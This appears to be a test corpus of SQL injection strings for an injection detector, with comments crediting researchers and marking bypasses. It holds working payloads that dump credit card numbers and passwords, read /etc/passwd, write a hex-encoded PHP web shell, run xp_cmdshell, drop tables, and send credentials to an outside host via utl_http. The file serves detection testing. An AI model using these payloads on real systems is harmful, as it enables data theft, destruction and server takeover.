FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
|
||||
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
|
||||
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
|
||||
1+order+by+1
|
||||
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
|
||||
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
|
||||
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
|
||||
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
|
||||
1 - ORD('A')
|
||||
TRUE DIV(SELECT ORD(LEFT
|
||||
TRUE DIV(SELECT (ORD(LEFT
|
||||
TRUE DIV(SELECT ((ORD(LEFT
|
||||
1 DIV(SELECT ORD(LEFT
|
||||
1 DIV(SELECT (ORD(LEFT
|
||||
0 UNION SELECT (1),2,3
|
||||
1 AND (SELECT TOP 10 USERNAME FROM USERS);
|
||||
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 GROUP BY 1 HAVING 1 = 1
|
||||
1 GROUP BY 1 HAVING '1' = 1
|
||||
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
|
||||
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
|
||||
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
|
||||
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
|
||||
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
|
||||
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
|
||||
'6334588?'||SLEEP(3)&&'1
|
||||
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
|
||||
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
|
||||
(1001)union select-1,ccnumber,3,4 from credit_cards
|
||||
(1001)union select (1),ccnumber,3,4 from credit_cards
|
||||
(1001)union select @a,ccnumber,3,4 from credit_cards
|
||||
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
|
||||
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001-'text' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001'-@a union select 1,2,3,4 from credit_cards-- -
|
||||
'1001'-@a union select 1,2,3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1)union select 1,2,3,4 from credit_cards
|
||||
## 1001 ----1 union select 1,2,3,4 from credit_cards
|
||||
1001 or 'foo' union select 1,2,3,4 from credit_cards
|
||||
1001 and @a union select 1,2,3,4 from credit_cards
|
||||
1001 like @a-1 union select 1,2,3,4 from credit_cards
|
||||
1001-\N-\N union select 1,2,3,4 from credit_cards
|
||||
(1001-\N-\N) union select 1,2,3,4 from credit_cards
|
||||
(1001-\N)-\N union select 1,2,3,4 from credit_cards
|
||||
1001-\N union select 1,2,3,4 from credit_cards
|
||||
1001-true union select 1,2,3,4 from credit_cards
|
||||
(1001-true) union select 1,2,3,4 from credit_cards
|
||||
(1001-'1') union select 1,2,3,4 from credit_cards
|
||||
(1001-@version) union select 1,2,3,4 from credit_cards
|
||||
1-(1001-true) union select 1,2,3,4 from credit_cards
|
||||
1001-false-false union select 1,2,3,4 from credit_cards
|
||||
1001-false-NULL union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
|
||||
(1)-'1' union select 1,2,3,4 from credit_cards
|
||||
(1)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-1 union select 1,2,3,4 from credit_cards
|
||||
(@version)-'1' union select 1,2,3,4 from credit_cards
|
||||
@version-@version union select 1,2,3,4 from credit_cards
|
||||
@version-1 union select 1,2,3,4 from credit_cards
|
||||
@version-'1' union select 1,2,3,4 from credit_cards
|
||||
('1')-'1' union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike('1')union select 1,2,3,4 from credit_cards
|
||||
# vv new variations 2013-04-10 nickg vv
|
||||
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
|
||||
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
|
||||
# a'+'b encoded is a%27%2B%27b
|
||||
a%27%2B%27b
|
||||
' OR 1='1
|
||||
|
||||
# new variations
|
||||
X' != 'Y' = 0 = '1
|
||||
X' = 'X' = 0 = '1
|
||||
X' = 'X' = 'X' = 0 = '1
|
||||
X' - 'Y' - 0 = '1
|
||||
|
||||
# part of parameter pollution
|
||||
1) FROM USERS WHERE USERNAME=
|
||||
|
||||
# nest pgsql mssql comments
|
||||
1/* /*/ */ */ or 1=1-
|
||||
1/* /* / */ */ or 1=1-
|
||||
|
||||
# small sqli
|
||||
1--
|
||||
1 --
|
||||
1 --
|
||||
1/*
|
||||
1 /*
|
||||
1 /*
|
||||
1*1--
|
||||
1 * 1--
|
||||
1 * 1 --
|
||||
1*1/*
|
||||
1 * 1/*
|
||||
1 * 1 /*
|
||||
1 * 1 /*
|
||||
@version--
|
||||
@@version--
|
||||
@version --
|
||||
@version /*
|
||||
@version/*
|
||||
|
||||
# thanks @d0znpp
|
||||
(select id from users limit 1,1)
|
||||
(select id-0 from users limit 1,1)
|
||||
# known bypass.. for now!
|
||||
(select id,id,id,id from users limit 1,1)
|
||||
|
||||
# some variations
|
||||
'1' union (select id from users limit 1,1)
|
||||
1 union (select id from users limit 1,1)
|
||||
xxx union (select id from users limit 1,1)
|
||||
@version union (select id from users limit 1,1)
|
||||
|
||||
'1' union (select 1 from users limit 1,1)
|
||||
1 union (select 1 from users limit 1,1)
|
||||
xxx union (select 1 from users limit 1,1)
|
||||
@version union (select 1 from users limit 1,1)
|
||||
|
||||
'1' union (select xxx from users limit 1,1)
|
||||
1 union (select xxx from users limit 1,1)
|
||||
xxx union (select xxx from users limit 1,1)
|
||||
@version union (select xxx from users limit 1,1)
|
||||
|
||||
'1' union (select 's' from users limit 1,1)
|
||||
1 union (select 's' from users limit 1,1)
|
||||
xxx union (select 's' from users limit 1,1)
|
||||
@version union (select 's' from users limit 1,1)
|
||||
|
||||
# thanks @LightOS
|
||||
-1 union(((select table_name from information_schema.tables limit 1,1)))
|
||||
'1' union(((select table_name from information_schema.tables limit 1,1)))
|
||||
@foo union(((select table_name from information_schema.tables limit 1,1)))
|
||||
id union(((select table_name from information_schema.tables limit 1,1)))
|
||||
|
||||
# and again @LightOS
|
||||
test'-1/1/**/union(select table)
|
||||
test'-1 union(select table)
|
||||
test'-@version union (select table)
|
||||
test'-'xyz' union (select table)
|
||||
1- @version union(select table_name from information_schema.tables limit 1,1)
|
||||
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
1- union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - @version union(select table_name from information_schema.tables limit 1,1)
|
||||
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - 5 union(select table_name from information_schema.tables limit 1,1)
|
||||
|
||||
#
|
||||
1 into outfile 'asd'
|
||||
1 into outfile 'asd'--
|
||||
'1' into outfile 'asd'
|
||||
'1' into outfile 'asd' --
|
||||
@version into outfile 'asd'
|
||||
@version into outfile 'asd' --
|
||||
|
||||
1 into outfile ('asd')
|
||||
'1' into outfile ('asd')
|
||||
@version into outfile ('asd')
|
||||
|
||||
1 into outfile substring('asd', 10, 1)
|
||||
'1' into outfile substring('asd', 10, 1)
|
||||
@version into outfile substring('asd', 10 1)
|
||||
|
||||
1 into outfile (substring('asd', 10, 1))
|
||||
'1' into outfile (substring('asd', 10, 1))
|
||||
@version into outfile (substring('asd', 10 1))
|
||||
|
||||
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
|
||||
union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
#
|
||||
# This is not valid SQL but designed to force a syntax error
|
||||
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=1
|
||||
1%0Aand+current_user=@version
|
||||
1%0Aand+current_user='junk'
|
||||
1%0Aand+current_user=foo
|
||||
|
||||
|
||||
|
||||
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
|
||||
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
case 1 when 2 then 2 end
|
||||
case sin(1) when 2 then 2 end
|
||||
case '1' when 2 then 2 end
|
||||
case 1 when 's' then 2 end
|
||||
case when 2 then 3 end
|
||||
case when 's' then 3 end
|
||||
case when f(1) then 3 end
|
||||
|
||||
-1 union select table_name asda from information_schema.tables
|
||||
-1 union select table_name "asda" from information_schema.tables
|
||||
-1 union select table_name `asda` from information_schema.tables
|
||||
-1 union select table_name as asda from information_schema.tables
|
||||
-1 union select table_name as "asda" from information_schema.tables
|
||||
-1 union select table_name as `asda` from information_schema.tables
|
||||
|
||||
a'and(select(binary(/*!system_user()*/)))like'reading%25
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
'foo' union select @``"", table_name from information_schema.tables
|
||||
@version union select @``"", table_name from information_schema.tables
|
||||
|
||||
select @version foo
|
||||
select @version "foo"
|
||||
select @version foo -- junk
|
||||
select @version "foo" -- junk
|
||||
|
||||
$$pgsql evade$$ union select * from foo
|
||||
$foo$pgsql evade$foo$ union select * from foo
|
||||
|
||||
u&'pgsql evade' union select * from foo
|
||||
U&'pgsql evade' union select * from foo
|
||||
|
||||
U&'pgsql evade' uescape '!' union select * from foo
|
||||
|
||||
_latin1'foo' union select * from foo
|
||||
_LATIN7'foo' union select * from foo
|
||||
_utf8'foo' union select * from foo
|
||||
|
||||
REAL 1 union select * from foo
|
||||
1::REAL union select * from foo
|
||||
1::REAL::REAL union select * from foo
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
!~1 union select table_name from information_schema.tables
|
||||
-1 union select @a`from 1`, table_name from information_schema.tables
|
||||
version() union select table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
1 is unknown union select table_name from information_schema.tables
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
1 for update union select 1
|
||||
|
||||
# ht/ TK
|
||||
(true)-(true)union select table_name from information_schema.tables
|
||||
(@a)-(@a)union select table_name from information_schema.tables
|
||||
|
||||
# ht/ @stamparm
|
||||
1 OR (1 OR 1)--
|
||||
(1) OR (1 OR 1)--
|
||||
((1) OR (1 OR 1))--
|
||||
((1) OR ((1 OR 1)))--
|
||||
1 OR ((1 OR 1)) --
|
||||
1 OR ((1) OR 1) --
|
||||
|
||||
# ht/ @stamparm
|
||||
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
|
||||
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
|
||||
# ht/ @stamparm
|
||||
(SELECT 1 FROM DUAL)
|
||||
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
|
||||
(SELECT (1) FROM DUAL)
|
||||
(select @version from dual)
|
||||
(select (@version - 1) from dual)
|
||||
(select ('foo' - 1) from dual)
|
||||
(select 'foo' from dual)
|
||||
(select 1 foobar from dual)
|
||||
|
||||
# previously had problems with operators made from two words
|
||||
# ht/@stamparm
|
||||
1 and 1 not between 0 and 1
|
||||
1 AND 1 SOUNDS LIKE 1
|
||||
1 AND 1 NOT LIKE 0
|
||||
|
||||
(1 AND 1) OR 2>1--
|
||||
|
||||
# ht/@FluxReiners
|
||||
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
|
||||
'-(-1 or -1) and 1=0 union
|
||||
'-(-(1) or -1) and 1=0 union
|
||||
'-((1) or -1) and 1=0 union
|
||||
|
||||
# https://twitter.com/dsrbr/status/342132003270959104
|
||||
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
|
||||
-1 union select null, stragg(login || ':' || pass ||', ') from users;
|
||||
|
||||
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
|
||||
#ht ivan
|
||||
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
|
||||
|
||||
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
|
||||
1'=sleep(1)='1
|
||||
|
||||
# https://twitter.com/dsrbr/status/343017094926962691
|
||||
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
|
||||
|
||||
# https://twitter.com/dsrbr/status/341228356936814592
|
||||
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
|
||||
|
||||
# https://twitter.com/dsrbr/status/340018970054766592
|
||||
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
|
||||
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
|
||||
|
||||
# http://www.exploit-db.com/exploits/25915/
|
||||
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
|
||||
|
||||
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
|
||||
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||
|
||||
# misc secondary sql statements
|
||||
1 and true; BEGIN DECLARE @xy varchar(8000)
|
||||
1; BEGIN DECLARE @xy varchar(8000)
|
||||
x' and 1 = 0; BEGIN DECLARE
|
||||
x' AND 1=0; DROP TABLE TMP_DB;
|
||||
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
|
||||
|
||||
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
|
||||
|
||||
# https://twitter.com/st1ll_di3/status/344416764949561346
|
||||
# http://pastebin.com/Ymcs7nE0
|
||||
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
|
||||
|
||||
# example from http://www.websec.ca/kb/sql_injection
|
||||
1=1 AND-+-+-+-+~~((1))
|
||||
|
||||
# the bizarre sp_password hackery
|
||||
1-- foo sp_password
|
||||
1'--sp_password
|
||||
|
||||
# nice ms-access, courtesy mod-security
|
||||
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
|
||||
|
||||
# mysql and pgsql string litterals
|
||||
b'1' UNION SELECT 1
|
||||
x'1' UNION SELECT 1
|
||||
n'1' UNION SELECT 1
|
||||
|
||||
# ending clauses
|
||||
1 having 1 limit 1 union select 1--
|
||||
1 having (1) limit 1 union select 1--
|
||||
1 having -(1) limit 1 union select 1--
|
||||
1 having sin(1) limit 1 union select 1--
|
||||
1 having 1 limit 2 group by 3 union select 1--
|
||||
1 group by 2 union select 1 --
|
||||
sin(1) group by 1 union select 1--
|
||||
@version group by 1 union select 1--
|
||||
@version group by (-1) union select 1--
|
||||
(@version) group by -1 union select 1--
|
||||
(@version) group by (-1) union select 1--
|
||||
(@version)) group by (-1) union select 1--
|
||||
(1)) group by (-1) union select 1--
|
||||
(@version) group by sin(-1) union select 1--
|
||||
1 group by sin(1) union select 1--
|
||||
1 group by 1 - sin(1) union select 1--
|
||||
1 group by (sin(1)) union select 1--
|
||||
-1 group by -(-sin(1)) union select 1--
|
||||
sin(1) group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by 1 union select 1--
|
||||
1 group by ((1)) union select 1--
|
||||
1 group by (((1))) union select 1--
|
||||
((1)) group by (1) union select 1--
|
||||
(1) group by ((1)) union select 1--
|
||||
(1) group by (1) union select 1--
|
||||
|
||||
# more with 'having'
|
||||
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(true) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(null) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
\''; DROP TABLE users; --
|
||||
\''); DROP TABLE users; --
|
||||
\''; /* one */ ;DROP TABLE users; --
|
||||
\''; select 1; drop table users; --
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
|
||||
EXEC sp_add_job @job_name = 'TestJob';
|
||||
EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;print 'foo'; exec xp_cmdshell 'destroy';
|
||||
|
||||
# nested sub-selects
|
||||
-1 - (select (1 - select (select 1))) union all select 2 --
|
||||
-1 - (select 1) - union all select 2 --
|
||||
(select 1) - 1 union all select 2 --
|
||||
((select 1) - 1) + (select 1) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (select ((select 1))) union all select 2 --
|
||||
(select ((select 1 - (select 1))) union all select 2 --
|
||||
(select (select (((select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (((select (select 1))) union all select 2 --
|
||||
(select (select (1 - select 1))) union all select 2 --
|
||||
(select (select 1 - (select 1))) union all select 2 --
|
||||
(select 1 - (select 1 - (select 1))) union all select 2 --
|
||||
|
||||
# moar unions
|
||||
-1 union distinct select table_name from information_schema.tables
|
||||
-1 union distinct all select table_name from information_schema.tables
|
||||
-1 union all distinct select table_name from information_schema.tables
|
||||
-1 union all select table_name from information_schema.tables
|
||||
|
||||
# more
|
||||
if(1, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if((1), -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
|
||||
true in(2, 1) union select table_name from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
-1 union select current_user``union select table_name from information_schema.tables
|
||||
|
||||
if(1, 1, 2) union select 3
|
||||
if(sin(1), 1, 2) union select 3
|
||||
if(1, sin(1), 2) union select 3
|
||||
if(1 - sin(1), 2) union select 3
|
||||
if((1), 1, 2) union select 3
|
||||
if(-(1), 1, 2) union select 3
|
||||
|
||||
#
|
||||
1; if exists ( /* anything */
|
||||
|
||||
# these aren't SQL but close enough
|
||||
union (select 1)--
|
||||
union all (select 1)--
|
||||
union all (select distinct 1)--
|
||||
union (select 1,2,3,4,5)--
|
||||
union (select -1,2,3,4,5)--
|
||||
union (select -(1),2,3,4,5)--
|
||||
union (select -sin(1),2,3,4,5)--
|
||||
1;call p(@version, @a)
|
||||
1;load data infile "foo"
|
||||
1;load xml infile "foo"
|
||||
1;load xml local infile "foo"
|
||||
1;load xml low_priority infile "foo"
|
||||
1;load xml concurrent infile "foo"
|
||||
1; delete from foo
|
||||
1; delete low_priority from foo
|
||||
1; delete quick from foo
|
||||
1; delete ignore from foo
|
||||
|
||||
|
||||
1;do (1=1)
|
||||
|
||||
-0b01 for update union select table_name from information_schema.tables limit 1
|
||||
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
|
||||
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
|
||||
|
||||
binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - (binary (false)) union select table_name from information_schema.tables limit 1
|
||||
binary binary 1 union select table_name from information_schema.tables
|
||||
binary -1 union select table_name from information_schema.tables
|
||||
binary -(1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
|
||||
# werid slash escaping in Older T-SQL databases
|
||||
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
\1=\1AND\1=\1;
|
||||
|
||||
# more weird T-SQL weirdness
|
||||
\%250=\-1AND\*1=\/1
|
||||
|
||||
# mysql
|
||||
-1 procedure analyse() union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
|
||||
# HT @LightOS
|
||||
# issue here is how '1gfsdg..' is processed.
|
||||
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(select 1 foo) union select load_file('foo');
|
||||
|
||||
#
|
||||
# Anonymous from Research Institution of Telecom in Beijing, China
|
||||
# commenting out since i have no idea how this could be a true SQL injection
|
||||
#=1 union select admin,pass from admin limit 1
|
||||
#=1 union select 1,2,3,4,5,6
|
||||
|
||||
# problems with type-casting, and nested type casting
|
||||
#
|
||||
# credit: Reto Ischi
|
||||
#
|
||||
's' || binary(1)# and n='foo"
|
||||
1 - binary (1 - binary(1)) UNION SELECT 2 --
|
||||
1 - binary (binary(1) -1) UNION SELECT 2 --
|
||||
binary (1 - binary(1)) UNION SELECT 2 --
|
||||
binary (binary(1) - 1) UNION SELECT 2 --
|
||||
binary (binary(1)) UNION SELECT 2 --
|
||||
|
||||
#
|
||||
# Padding using between operator
|
||||
#
|
||||
(1 between @version and "2") & 1 UNION SELECT 1
|
||||
(1 between @version and @user) & 1 UNION SELECT 1
|
||||
(1 between 1 and @version) & 1 UNION SELECT 1
|
||||
(1 between '1' and @version) & 1 UNION SELECT 1
|
||||
(1 between 1 and 2) & 1 UNION SELECT 1
|
||||
(1 between '1' and '2') & 1 UNION SELECT 1
|
||||
(1 between 1 and '2') & 1 UNION SELECT 1
|
||||
(1 between '1' and 2) & 1 UNION SELECT 1
|
||||
('1' between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between 1 and '2') & 1 UNION SELECT 1
|
||||
|
||||
#
|
||||
# ANY and SOME subqueries
|
||||
#
|
||||
1 - ANY(SELECT 1,2)
|
||||
ANY(SELECT 1) - 1 UNION ALL --
|
||||
ANY(SELECT (1)) - 1 UNION ALL --
|
||||
